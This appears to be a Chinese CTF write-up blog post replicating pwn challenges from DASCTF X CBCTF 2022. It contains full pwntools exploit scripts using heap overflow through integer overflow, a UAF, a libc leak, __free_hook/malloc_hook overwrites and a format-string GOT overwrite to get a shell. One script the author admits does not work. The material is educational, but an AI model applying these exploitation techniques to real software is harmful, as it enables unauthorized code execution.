DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现

最新推荐文章于 2022-12-03 14:30:02 发布
最新推荐文章于 2022-12-03 14:30:02 发布
阅读量1.1k 收藏
点赞数
分类专栏: pwnstudy 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FUCKING12/article/details/127114881
版权

DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现

**

ez_note

**
请添加图片描述
漏洞点:注意这里·是atol不是atoi所以输入的是64位的数据
但是检测输入size的时候是用按int类型检查,可以造成堆溢出。请添加图片描述
找到漏洞点了就可以利用了,重点在堆利用这块。
先看看exp:

from pwn import *
context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
p = process('./pwn')
#elf=ELF('./pwn')

#io = remote('59.110.24.117',33320)
libc = ELF('/home/pwn/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc-2.31.so')
rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
def dbg():
    gdb.attach(p)
    pause()

def add(size,content):
    sa('Your choice:',str(1))
    sa('Note size:',str(size))
    sa('Note content:',content)

def delete(index):
    sa('Your choice:',str(2))
    sa('Note ID:',str(index))

def show(index):
    sa('Your choice:',str(3))
    sa('Note ID:',str(index))
    ru('Note content:')

# add(0x108,'a'*0x108)
add(0x80,'a')
add(0x80,'a')
add(0x200,'a')#2
add(0x200,'a')#3
add(0x80,'a')#4
# add(0x80,'a')
delete(0)
payload=b'a'*0x80+p64(0)+p64(0x4b1)
# dbg()
add(0x200000080,payload)#0
# dbg()
delete(1)
add(0x80,'a')#1
show(2)
# dbg()
libcbase=u64(p.recv(6).ljust(8, "\x00"))-0x1ecbe0
free_hook=libcbase+libc.symbols['__free_hook']
system=libcbase+libc.symbols['system']
lg('libcbase')
add(0x200,'a')#5
add(0x200,'a')#6
# delete(1)
# payload=b'a'*0x80+p64(0)+p64(0x421)
# add(0x80,payload)#1
# delete(2)
# add(0x200,'a')#2
# # add(0x200,'a')#7    
# #6 3 7
# # delete(5)
# delete(3)
# dbg()
# payload=p64(free_hook)+p64(0)
# add(0x200,payload)#7

# delete(6)
delete(3)
delete(2)
delete(1)
payload=b'a'*0x80+p64(0)+p64(0x211)+p64(free_hook)+p64(0)
add(0x200000080,payload)#1
add(0x200,b'/bin/sh\x00')#2
add(0x200,p64(system))#3
delete(2)

# dbg()
irt()

add(0x80,'a')
add(0x80,'a')
add(0x200,'a')#2
add(0x200,'a')#3
add(0x80,'a')#4
# add(0x80,'a')
delete(0)
payload=b'a'*0x80+p64(0)+p64(0x4b1)
# dbg()
add(0x200000080,payload)#0

这几行代码的意思是删除了chunk0后再申请0x200000080大小的chunk,因为有个整数溢出,所以0x200000080大小的堆块就是0x80大小。payload把chunk1,2,3合并成一个大小为0x4b1chunk。
请添加图片描述
然后是泄露libc地址。

delete(1)
add(0x80,'a')#1
show(2)
# dbg()
libcbase=u64(p.recv(6).ljust(8, "\x00"))-0x1ecbe0
free_hook=libcbase+libc.symbols['__free_hook']
system=libcbase+libc.symbols['system']
lg('libcbase')

add(0x200,'a')#5
add(0x200,'a')#6
# delete(1)
# payload=b'a'*0x80+p64(0)+p64(0x421)
# add(0x80,payload)#1
# delete(2)
# add(0x200,'a')#2
# # add(0x200,'a')#7    
# #6 3 7
# # delete(5)
# delete(3)
# dbg()
# payload=p64(free_hook)+p64(0)
# add(0x200,payload)#7

# delete(6)
delete(3)
delete(2)
delete(1)
# dbg()
payload=b'a'*0x80+p64(0)+p64(0x211)+p64(free_hook)+p64(0)
add(0x200000080,payload)#1
add(0x200,b'/bin/sh\x00')#2
add(0x200,p64(system))#3
delete(2)

最后是劫持free_hook为system,得到shell。
请添加图片描述

bar

请添加图片描述

白给libc地址(为什么打比赛的时候没看这题doge)
请添加图片描述
有uaf。

from pwn import *
def dbg():
    gdb.attach(r)
    pause()

def cho(num):
    r.sendlineafter("Your choice:",str(num))

def add(idx,con):
    cho(1)
    r.sendlineafter("Whisky , brandy or Vodka?",str(idx))
    r.sendafter("You may want to tell sth to the waiter:",con)

def free(idx,size=0x100):
    cho(2)
    r.sendlineafter("Which?",str(idx))
    r.sendlineafter("How much?",str(size))

def exp():
    global r  
    global libc
    global elf
    # r=remote("127.0.0.1",9999)
    r=process('./bar')
    libc=ELF('./libc-2.31.so')
    cho(3)
    r.recvuntil("icecream!\n")
    libcbase=int(r.recvuntil('\n',drop=True),16)-libc.sym['_IO_2_1_stdout_']
    log.success("libcbase:"+hex(libcbase))

    ##set_libc_func
    ##system=libcbase+libc.sym['system']
    one=[0xe6aee,0xe6af1,0xe6af4]
    onegadget=libcbase+one[1]
    for i in range(0,10):
        add(0,'nameless') 
    for i in range(0,9):
        free(i)
    # dbg()
    add(0,'nameless')#10
    # dbg()
    ##z()
    free(8,0)
    # dbg()
    add(1,'nameless')#11
    add(1,'nameless')#12
    add(2,'nameless')#13
    # dbg()
    free(8,0x80)
    # dbg()
    add(0,'nameless')#14
    # dbg()
    # gdb.attach(r)
    # pause()
    add(0,p64(onegadget))
    # dbg()
    # add(0,'cat ')
    # dbg()
    r.interactive()
    
if __name__ == '__main__':
    exp()

    for i in range(0,10):
        add(0,'nameless') 
    for i in range(0,9):
        free(i)

先申请10个chunk,再释放前9个。
7个在tcache bins里面,还有2个在unsorted bin里面。
请添加图片描述

    add(0,'nameless')#10
    # dbg()
    ##z()
    free(8,0)
    # dbg()
    add(1,'nameless')#11
    add(1,'nameless')#12
    add(2,'nameless')#13
    free(8,0x80)

再在tcache bin里面申请一个chunk,再释放index=8的那个,此时已经利用了uaf,unsoted bin里面和tcache bin里面都有这个chunk。
请添加图片描述

    add(0,'nameless')#14
    # dbg()
    # gdb.attach(r)
    # pause()
    add(0,p64(onegadget))

最后再将malloc_hook那填one_gadget得到shell。

appetizer

这题我也不大会,但说一下思路吧:
将rop链布置到end中,泄露出libc地址,通过最后一个read进行栈迁移
在第一个链中输出完之后再执行一个read向end写入第二个rop链
第二个rop链就是常规的orw了。
参考链接Mauricio_Davis师傅的blog
(对这种题头都大了doge)

cyberprinter

from pwn import *
context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
p = process('./cyberprinter')
elf=ELF('./cyberprinter')

#io = remote('59.110.24.117',33320)
libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
def dbg():
    gdb.attach(p)
    pause()
got_printf=elf.got['printf']


# payload = p64(got_printf) + "%9$s"
lg('got_printf')
sla('Your name?pls..\n',b'a'* 0x18)
ru('aaaaaaaaaaaaaaaaaaaaaaaa')
stdout_addr=u64(p.recv(6).ljust(8, "\x00"))
libcbase=stdout_addr-libc.symbols['_IO_2_1_stdout_']
one_gadget=libcbase+0xe6af1 #0xe6aee
got_addr=libcbase+0x1EB0A8
lg('stdout_addr')

payload=fmtstr_payload(8,{got_addr:one_gadget})
print payload
sla("But there is sth wrong in it,so you can't do sth\n",payload)
# rl()
irt()
#%7$p
#0x7f10db90c0a8 - 0x7f10db721000 0x1eb0a8

代码没通,只是个错误示范,欢迎各位师傅来鞭尸。
讲讲思路吧:第一个printf泄露libc地址,第2个printf改puts里面那个玩意为ogg得到shell。

cgrasstring

这题真心不想复现了,就前2个堆题搞懂了,后面的搞不明白(呜呜呜,我太菜了)
参考链接:官方wp

我好菜,呜呜呜。

thna0s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
A pwn challenge in 2022 美团高校赛 .zip
11-09
美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考 美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考 美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考 美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考 美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考 美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考 美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考 美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考 美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
Bugku S3 AWD排位赛-9 pwn二进制
最新发布
08-27
Bugku S3 AWD排位赛-9 pwn二进制
2022年中职网络安全竞赛天津市赛任务九-PWN(2)
12-20
1.访问靶机 FSserver登录FTP,找到pwn1文件夹,下载内容进行作答,通过缓冲区溢出 对pwn1靶机进行破解,获取目标靶机 shell得到flag: Flagf}样例: flag{×xxx}。nc pwn1靶机ip 10000 2. 访问靶机FServer登录FTP,找到pln2文件夹,下载内容进行作答,通过缓冲区溢出 对pwn2靶机进行破解,获取目标靶机 shell得到flag;Flag]样例: flag{xxxx}。nc pwn2靶机ip 10001
DASCTF X CBCTF 2022九月挑战赛 reverse landing
weixin_63051469的博客
09-22 649
胡小楠的刷题日常
DASCTF X CBCTF 2022九月挑战赛-Pwn
qq_34010404的博客
09-19 536
buf 后面跟着一个libc的地址,可以leak libc 的基址下面跟着一个格式串漏洞,puts里面调用的strlen,改那个got为one_gadget 即可(这个题刚好有一个满足的gadget)栈溢出,但是只能覆盖返回地址,栈迁移做就行UAF 可以改fd (加或减去一个偏移)
DASCTF X CBCTF 2022九月挑战赛 WriteUp
Whitebird的博客
10-24 483
DASCTF X CBCTF 2022九月挑战赛 WriteUp
DASCTF X CBCTF 2022九月挑战赛 学习记录
m0_64815693的博客
09-23 1849
学习记录
4、Linux入门学习笔记 文件操作命令
m0_38075171的博客
11-04 154
4、Linux入门学习笔记 文件操作命令 文件操作命令 touch命令:生成新文件命令 cat命令:查看文件内容命令 把cat命令反写成tac命令 可以把文件内容反向输出显示 more命令:查看内容较多的文件可以进行翻页的命令 正序翻页,从上往下;不可向上翻页;默认显示10行 less命令:同more命令,支持向上翻页 当默认10行时倒序翻页,从下往上,当指定行数时,从上往下;可向上翻页;默认显示10行 head命令:显示文件前面的前几行命令 tail命令:与head相反的命令 ...
2021DASCTF July X CBCTF pwn wp
qq_39948058的博客
08-26 280
此题是7月末的比赛,本人旧博客搬到新博客啦,各位见谅哈(实际就是没钱租用服务器啦呜呜) **EasyHeap wp: Edit有堆溢出,有沙箱,禁用了execute,freehook为setcontext+5361即可,尝试orw就行了。写shellcode到hook,赋予权限即可,** exp: from pwn import * context(os='linux',arch='amd64',log_level='debug') p=process('./Easyheap') p=rem
[零基础学IoT Pwn] 复现Netgear WNAP320 RCE.doc
07-11
[零基础学IoT Pwn] 复现Netgear WNAP320 RCE.doc
2021DASCTF July X CBCTF--cat flag
qq_46263951的博客
08-02 360
很难受啊,比赛的时候根据提示猜到flag的文件名肯定在日志文件中,但不知道日志文件在哪里... 进去后直接给出一段php代码 <?php if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; if (!preg_match('/flag/i',$cmd)) { $cmd = escapeshellarg($cmd); system('cat ' . $cmd); } } else { .
2021DASCTF July X CBCTF 4th(wp)
qq_50589021的博客
08-25 795
CRYPTO Yusa的密码学签到——BlockTrick nc连接以后出来哪个就复制哪个,最后得到flag WEB ezrce 此题属于是YAPI接口管理平台RCE,利用csdn上找到的exp可以直接打: YAPI接口管理平台RCE复现-附exp cat flag 这个题目有点脑洞了 首先是访问/var/log/nginx/aeecss.log 得知真正的flag文件 然后写了一个ascii的不可见字符的fuzz字典生成脚本: <?php $myfile = fopen("ascii.txt"
atoi函数的详细实现(考虑溢出)
08-14 7655
atoi()函数的功能:将字符串转换成整型数。atoi()会扫描参数str字符串,跳过前面的空白字符,直到遇上数字或正负号才开始做转换,而再遇到非数字或字符串时('\0')才结束转化,并将结果返回(返回转换后的整型数)。 写atoi函数的时候需要注意一下几点 1. 忽略字符串前的空白字符 2. 字符串所表示数值的正负号 3. 结束条件,遇到非数字或者字符'\0'结束 4. 考虑溢
DASCTF NOV X联合出题人2022年度积分榜争夺赛!Crypto Wp
mxx307的博客
12-03 789
DASCTF NOV X联合出题人2022年度积分榜争夺赛!Crypto Wp
DASCTF X GFCTF 2022十月挑战赛 - pwn
z1r0的博客
10-28 833
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall。这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了。发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh。这里的地方,并且最后还可以控制ret。
DASCTF X CBCTF 2022九月挑战赛 cyberprinter wp
qq_65147345的博客
10-02 313
通过格式化字符串漏洞改写libc中strlen的got表地址为one_gadget
iscc2016 pwn部分writeup
05-25 344
一.pwn1 简单的32位栈溢出,定位溢出点后即可写exp gdb-peda$ r Starting program: /usr/iscc/pwn1 C'mon pwn me : AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAg...
DASCTF X CBCTF 2022九月挑战赛
shinygod的博客
10-19 636
找给 check.php 发包的那个部分。可以在开发者工具里全局搜索一下,发现是 sn 这个函数发的包,代码有点乱可以。在 sn 函数中看到了三个参数的设置。先看一下是在哪边调用的 sn ,然后一个一个的跟踪就行了。搜索 checkCode ,checkCode 由一串字符串和 salt 构成,而 tm 是时间戳,score 是分数,最后就可以构造 exp了。
pwn mmap sandbox close
05-24
Pwn挑战赛中,可能会遇到一些涉及到mmap、sandbox和close的问题。下面是一些简单的解释: - mmap:mmap是一种在内存中映射文件的方法。在Pwn挑战赛中,可能会用到它来实现一些内存操作。但需要注意的是,mmap的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值